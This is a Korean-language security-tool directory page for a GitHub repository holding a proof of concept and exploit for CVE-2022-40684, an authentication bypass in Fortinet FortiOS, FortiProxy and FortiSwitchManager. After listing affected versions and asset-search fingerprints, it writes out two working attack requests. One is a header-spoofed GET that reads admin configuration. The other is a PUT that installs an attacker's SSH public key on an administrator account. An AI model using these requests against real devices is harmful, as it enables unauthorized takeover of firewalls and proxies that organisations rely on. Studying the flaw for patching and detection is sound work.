Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/hughink/cve-2022-40684
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubhughink/cve-2022-40684

CVE-2022-40684

CVE-2022-40684에 대한 PoC 및 익스플로잇입니다. 이 취약점은 Fortinet FortiOS, FortiProxy 및 FortiSwitchManager 관리 인터페이스의 인증 우회로, 조작된 HTTP 요청을 통해 인가되지 않은 관리자 접근을 가능하게 합니다.

저장소 보기
113243년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-40684

법률 준수:

모든 개인과 조직은 네트워크를 사용할 때 헌법과 법률을 준수하고, 공공 질서를 지키며, 사회 공덕을 존중해야 하며, 네트워크 보안을 해쳐서는 안 되며, 국가 안전, 명예 및 이익을 해치는 활동에 네트워크를 이용해서는 안 됩니다.

취약점 개요:

Fortinet(飞塔)은 세계적으로 유명한 네트워크 보안 제품 및 보안 솔루션 제공업체로, 제품에는 방화벽, 안티바이러스 소프트웨어, 침입 방지 시스템 및 엔드포인트 보안 구성 요소 등이 포함됩니다. 영향을 받는 FortiOS, FortiProxy 및 FortiSwitchManager 제품의 관리 인터페이스에서 대체 경로나 채널을 사용하여 인증을 우회하고, 인증 없이 특수하게 조작된 HTTP 또는 HTTPS 요청을 통해 관리 인터페이스에 작업을 수행할 수 있습니다.

위험 등급:

높음

영향을 받는 버전:

FortiOS 버전 7.2.0 - 7.2.1

FortiOS 버전 7.0.0 - 7.0.6

FortiProxy 버전 7.2.0

FortiProxy 버전 7.0.0 - 7.0.6

FortiSwitchManager 버전 7.2.0

FortiSwitchManager 버전 7.0.0

자산 식별:

title="FortiProxy"

title="FortiGate"

취약점 재현:

poc

image

root@kitploit:~
GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

EXP

image

root@kitploit:~
PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json

{"ssh-public-key1": "\"公钥内容\""}

image

image

도구 다운로드